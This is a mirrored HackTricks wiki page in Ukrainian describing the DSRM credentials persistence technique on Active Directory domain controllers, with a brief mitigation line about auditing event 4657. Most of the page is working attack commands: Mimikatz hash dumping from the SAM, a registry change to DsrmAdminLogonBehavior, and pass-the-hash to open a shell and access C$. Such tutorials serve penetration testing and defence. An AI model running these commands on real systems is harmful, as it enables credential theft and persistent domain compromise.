mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
29 lines
2.7 KiB
Markdown
29 lines
2.7 KiB
Markdown
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
# DSRM Credentials
|
||
|
||
Існує обліковий запис **локального адміністратора** в кожному **DC**. Маючи адміністративні привілеї на цій машині, ви можете використовувати mimikatz для **вивантаження хешу локального адміністратора**. Потім, змінивши реєстр, ви можете **активувати цей пароль**, щоб мати можливість віддалено отримати доступ до цього локального облікового запису адміністратора.\
|
||
Спочатку нам потрібно **вивантажити** **хеш** облікового запису **локального адміністратора** всередині DC:
|
||
```bash
|
||
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
|
||
```
|
||
Тоді нам потрібно перевірити, чи цей обліковий запис працює, і якщо ключ реєстру має значення "0" або не існує, вам потрібно **встановити його на "2"**:
|
||
```bash
|
||
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
|
||
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
|
||
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
|
||
```
|
||
Потім, використовуючи PTH, ви можете **переглянути вміст C$ або навіть отримати оболонку**. Зверніть увагу, що для створення нової сесії PowerShell з цим хешем в пам'яті (для PTH) **"домен", що використовується, - це просто ім'я машини DC:**
|
||
```bash
|
||
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
|
||
#And in new spawned powershell you now can access via NTLM the content of C$
|
||
ls \\dc-host-name\C$
|
||
```
|
||
Більше інформації про це за адресами: [https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714) та [https://adsecurity.org/?p=1785](https://adsecurity.org/?p=1785)
|
||
|
||
## Пом'якшення
|
||
|
||
- ID події 4657 - Аудит створення/зміни `HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior`
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|